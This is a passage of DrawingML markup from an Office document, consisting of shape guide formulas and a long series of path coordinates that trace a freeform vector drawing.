                  <a:gd name="T49" fmla="*/ 0 h 638"/>
                  <a:gd name="T50" fmla="*/ 0 w 1527"/>
                  <a:gd name="T51" fmla="*/ 0 h 638"/>
                  <a:gd name="T52" fmla="*/ 0 w 1527"/>
                  <a:gd name="T53" fmla="*/ 0 h 638"/>
                  <a:gd name="T54" fmla="*/ 0 w 1527"/>
                  <a:gd name="T55" fmla="*/ 0 h 638"/>
                  <a:gd name="T56" fmla="*/ 0 w 1527"/>
                  <a:gd name="T57" fmla="*/ 0 h 638"/>
                  <a:gd name="T58" fmla="*/ 0 w 1527"/>
                  <a:gd name="T59" fmla="*/ 0 h 638"/>
                  <a:gd name="T60" fmla="*/ 0 w 1527"/>
                  <a:gd name="T61" fmla="*/ 0 h 638"/>
                  <a:gd name="T62" fmla="*/ 0 w 1527"/>
                  <a:gd name="T63" fmla="*/ 0 h 638"/>
                  <a:gd name="T64" fmla="*/ 0 w 1527"/>
                  <a:gd name="T65" fmla="*/ 0 h 638"/>
                  <a:gd name="T66" fmla="*/ 0 w 1527"/>
                  <a:gd name="T67" fmla="*/ 0 h 638"/>
                  <a:gd name="T68" fmla="*/ 0 w 1527"/>
                  <a:gd name="T69" fmla="*/ 0 h 638"/>
                  <a:gd name="T70" fmla="*/ 0 w 1527"/>
                  <a:gd name="T71" fmla="*/ 0 h 638"/>
                  <a:gd name="T72" fmla="*/ 0 w 1527"/>
                  <a:gd name="T73" fmla="*/ 0 h 638"/>
                  <a:gd name="T74" fmla="*/ 0 w 1527"/>
                  <a:gd name="T75" fmla="*/ 0 h 638"/>
                  <a:gd name="T76" fmla="*/ 0 w 1527"/>
                  <a:gd name="T77" fmla="*/ 0 h 638"/>
                  <a:gd name="T78" fmla="*/ 0 w 1527"/>
                  <a:gd name="T79" fmla="*/ 0 h 638"/>
                  <a:gd name="T80" fmla="*/ 0 w 1527"/>
                  <a:gd name="T81" fmla="*/ 0 h 638"/>
                  <a:gd name="T82" fmla="*/ 0 w 1527"/>
                  <a:gd name="T83" fmla="*/ 0 h 638"/>
                  <a:gd name="T84" fmla="*/ 0 w 1527"/>
                  <a:gd name="T85" fmla="*/ 0 h 638"/>
                  <a:gd name="T86" fmla="*/ 0 w 1527"/>
                  <a:gd name="T87" fmla="*/ 0 h 638"/>
                  <a:gd name="T88" fmla="*/ 0 w 1527"/>
                  <a:gd name="T89" fmla="*/ 0 h 638"/>
                  <a:gd name="T90" fmla="*/ 0 w 1527"/>
                  <a:gd name="T91" fmla="*/ 0 h 638"/>
                  <a:gd name="T92" fmla="*/ 0 w 1527"/>
                  <a:gd name="T93" fmla="*/ 0 h 638"/>
                  <a:gd name="T94" fmla="*/ 0 w 1527"/>
                  <a:gd name="T95" fmla="*/ 0 h 638"/>
                  <a:gd name="T96" fmla="*/ 0 w 1527"/>
                  <a:gd name="T97" fmla="*/ 0 h 638"/>
                  <a:gd name="T98" fmla="*/ 0 w 1527"/>
                  <a:gd name="T99" fmla="*/ 0 h 638"/>
                  <a:gd name="T100" fmla="*/ 0 w 1527"/>
                  <a:gd name="T101" fmla="*/ 0 h 638"/>
                  <a:gd name="T102" fmla="*/ 0 w 1527"/>
                  <a:gd name="T103" fmla="*/ 0 h 638"/>
                  <a:gd name="T104" fmla="*/ 0 w 1527"/>
                  <a:gd name="T105" fmla="*/ 0 h 638"/>
                  <a:gd name="T106" fmla="*/ 0 w 1527"/>
                  <a:gd name="T107" fmla="*/ 0 h 638"/>
                  <a:gd name="T108" fmla="*/ 0 w 1527"/>
                  <a:gd name="T109" fmla="*/ 0 h 638"/>
                  <a:gd name="T110" fmla="*/ 0 w 1527"/>
                  <a:gd name="T111" fmla="*/ 0 h 63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27"/>
                  <a:gd name="T169" fmla="*/ 0 h 638"/>
                  <a:gd name="T170" fmla="*/ 1527 w 1527"/>
                  <a:gd name="T171" fmla="*/ 638 h 63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27" h="638">
                    <a:moveTo>
                      <a:pt x="684" y="295"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="684" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="846" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="872" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="877" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="886" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="921" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="932" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="942" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="950" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="956" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="962" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="971" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="983" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="997" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1009" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1021" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1030" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1037" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1055" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1105" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1157" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1177" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1236" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1271" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1307" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1312" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1318" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1316" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1310" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1303" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1296" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1289" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1282" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1276" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1272" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1275" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1278" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1298" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1312" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1328" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1359" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1370" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1372" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1360" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1352" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1334" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1319" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1320" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1327" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1389" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1401" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1404" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1405" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1401" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1389" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1382" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1382" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1390" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1398" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1409" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1419" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1440" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1447" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1460" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1473" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1472" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1453" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1445" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1428" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1424" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1420" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1420" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1423" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1426" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1443" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1474" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1481" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1491" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1472" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1466" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1462" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1470" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1487" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1507" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1522" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1508" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1484" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1484" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1491" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1527" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1510" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1502" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1492" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1476" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1445" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1431" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1428" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1448" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1474" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1487" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1508" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1470" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1463" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1466" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1473" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1481" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1480" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1471" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1446" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1418" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1404" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1392" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1381" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1340" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1274" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1266" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1192" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1147" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1124" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1101" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1054" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1029" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1007" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="991" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="984" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="979" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="952" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="933" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="887" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="843" y="533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="784" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="780" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="713" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
